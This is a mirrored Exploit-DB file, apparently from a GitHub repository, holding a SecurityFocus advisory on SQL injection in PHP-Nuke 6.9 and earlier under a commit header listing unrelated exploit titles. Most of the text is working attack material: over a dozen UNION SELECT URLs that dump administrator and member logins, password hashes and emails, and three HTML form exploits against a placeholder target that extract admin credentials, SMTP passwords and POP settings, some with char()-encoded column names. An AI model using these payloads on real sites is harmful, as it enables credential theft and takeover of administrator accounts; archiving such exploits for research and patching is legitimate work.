bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/23631.txt
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

134 lines
No EOL
6.2 KiB
Text
Raw Blame History

source: https://www.securityfocus.com/bid/9544/info
Multiple SQL injection vulnerabilities have been reported in various modules included in PHP-Nuke versions 6.9 and earlier. These issues could permit remote attackers to compromise PHP-Nuke administrative accounts. Other attacks may also be possible, such as gaining access to sensitive information.
Some of these issues may overlap with previously reported SQL injection vulnerabilities in PHP-Nuke, but have all been reportedly addressed in PHP-Nuke 7.0.
- http://www.example.com/modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20
SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
- http://www.example.com/modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SEL
ECT%20pwd,0%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION
%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors
Display the login, the name and the password of an administrator if
the link 0 does not exist.
- http://www.example.com/modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20
SELECT%20pwd%20FROM%20nuke_authors
Re-steer towards the encrypted password.
- http://www.example.com/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20
UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*
Display all the logins administrator as well as their
encrypted passwords.
- http://www.example.com/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1
%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
Display logins, names and encrypted passwords of all the administrators.
- http://www.example.com/modules.php?name=Downloads&d_op=viewdownload&cid=-1%20
UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*
Display all the pseudos of the users, followed by their encrypted password.
- http://www.example.com/modules.php?name=Downloads&d_op=modifydownloadrequest&
lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,
user_email,user_level,0,0%20FROM%20nuke_users
Display logins, ID, encrypted passwords, names, emails and levels of
all the registered members.
- http://www.example.com/modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20
SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
- http://www.example.com/modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20
SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
Re-steer towards the encrypted password of the user id of which is 5.
- http://www.example.com/modules.php?name=Downloads&d_op=viewdownloadcomments&
lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20
FROM%20nuke_users/*
- http://www.example.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1
%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users
Display logins, ID and encrypted password of all the members.
- http://www.example.com/modules.php?name=Sections&op=listarticles&secid=-1%20UNION
%20SELECT%20pwd%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Sections&op=listarticles&secid=-1%20UNION
%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
- http://www.example.com/modules.php?name=Sections&op=printpage&artid=-1%20UNION%20
SELECT%20aid,pwd%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20
SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20
SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_autho
rs/*
--------------------PHPNUKEexploit1.html--------------------
<html>
<head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
<body>
<form method="POST" action="http://[target]/modules.php?name=Sections">
<input type="hidden" name="op" value="printpage">
<input type="text" name="artid" value="-1 UNION SELECT
CONCAT(name,char(58),aid),pwd FROM nuke_authors">
<input type="submit">
</form>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-026.html"
target="_blank"> Security-Corporation.com</a></p>
</body>
</html>
--------------------PHPNUKEexploit1.html--------------------
--------------------PHPNUKEexploit2.html--------------------
<html>
<head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
<body>
<form method="POST" action="http://[target]/modules.php?name=Downloads">
<input type="hidden" name="d_op" value="viewdownloadeditorial">
<input type="text" name="lid" value="-1 UNION SELECT
config_name,0,config_value,0 FROM nuke_bbconfig where
config_name=char(115,109,116,112,95,104,111,115,116) OR
config_name=char(115,109,116,112,95,117,115,101,114,110,97,109,101) OR
config_name=char(115,109,116,112,95,112,97,115,115,119,111,114,100)">
<input type="submit">
</form>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-026.html"
target="_blank"> Security-Corporation.com</a></p>
</body>
</html>
--------------------PHPNUKEexploit2.html--------------------
--------------------PHPNUKEexploit3.html--------------------
<html>
<head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
<body>
<form method="POST" action="http://[target]/modules.php?name=Downloads">
<input type="hidden" name="d_op" value="viewdownloadeditorial">
<input type="text" name="lid" value="-1 UNION SELECT
char(120),NOW(),char(32),CONCAT(char(60,98,114,62,76,111,103,105,110,32,58,3
2),uname,char(60,98,114,62,60,98,114,62,80,97,115,115,119,111,114,100,32,58,
32),passwd,char(60,98,114,62))
FROM nuke_popsettings">
<input type="submit">
</form>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-026.html"
target="_blank"> Security-Corporation.com</a></p>
</body>
</html>
--------------------PHPNUKEexploit3.html--------------------
Reference in a new issue View git blame Copy permalink